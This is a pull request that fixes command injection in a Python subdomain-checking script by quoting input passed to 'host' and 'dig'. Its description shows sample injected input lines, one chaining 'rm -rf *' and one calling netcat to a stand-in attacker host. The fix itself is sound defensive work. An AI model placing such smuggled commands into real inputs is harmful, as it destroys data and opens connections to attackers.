### PR TITLE
Fixing command injection by quoting the input.

### DIFF
--- a/dead_records.py
+++ b/dead_records.py
@@ -10,6 +10,7 @@ import pathlib
 from time import sleep
 from termcolor import colored, cprint
 from concurrent.futures import ThreadPoolExecutor
+from shlex import quote
 
 # Banner
 def banner():
@@ -66,7 +67,7 @@ def filter_dns(wordz):
 def dead_check(subz):
     global show_dead
     for s in subz:
-        cmd = "host " + s
+        cmd = "host " + quote(s)
         p = p = subprocess.Popen([cmd], stdout=subprocess.PIPE, shell=True)
         dead = p.stdout.read()
 
@@ -94,7 +95,7 @@ def dead_check(subz):
 # Make temp file
 def CNAME_check(deadz):
     for d in deadz:
-        cmd = "dig CNAME +short " + d
+        cmd = "dig CNAME +short " + quote(d)
         p = subprocess.Popen([cmd], stdout=subprocess.PIPE, shell=True)
         check = p.stdout.read()
 


### PR DESCRIPTION
The input of each subdomain wasn't being validated and this could lead to command injection in case the input file consists of such lines:

```
abc.example.com
subdomain.example.com ; rm -rf *
subdomain2.example.com ; nc attacker.com 9001
xyz.example.com
```

The commands after the separator were being executed and this has been prevented by quoting the subdomain input so the program will execute "host" and "dig" like:

```
host 'subdomain.example.com ; rm -rf *'
dig CNAME +short 'subdomain2.example.com ; nc attacker.com 9001'
```
... resulting in errors as the input between quotes would be considered invalid.